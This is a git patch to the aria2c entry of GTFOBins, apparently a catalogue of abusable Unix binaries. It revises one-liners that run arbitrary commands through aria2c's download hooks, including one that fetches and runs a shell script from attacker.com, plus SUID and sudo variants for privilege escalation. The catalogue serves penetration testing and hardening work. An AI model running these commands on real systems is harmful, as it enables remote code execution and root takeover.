From 17c3e974a782843de09c5c96529578dbea8aa94b Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 7 Sep 2018 13:30:55 +0200 Subject: [PATCH] Add a full local version of aria2c and add --allow-overwrite Close #22 --- _gtfobins/aria2c.md | 28 +++++++++++++++++++++------- 1 file changed, 21 insertions(+), 7 deletions(-) diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md index 941e371..7fc49c4 100644 --- a/_gtfobins/aria2c.md +++ b/_gtfobins/aria2c.md @@ -1,13 +1,27 @@ --- -description: | - Note that the subprocess is immediately sent to the background. - - The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. +description: Note that the subprocess is immediately sent to the background. functions: execute-non-interactive: - - code: aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa + - code: | + COMMAND='id' + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + aria2c --on-download-error=$TF http://x + - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. + code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa suid-enabled: - - code: ./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa + - code: | + COMMAND='id' + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + ./aria2c --on-download-error=$TF http://x sudo-enabled: - - code: sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa + - code: | + COMMAND='id' + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo aria2c --on-download-error=$TF http://x ---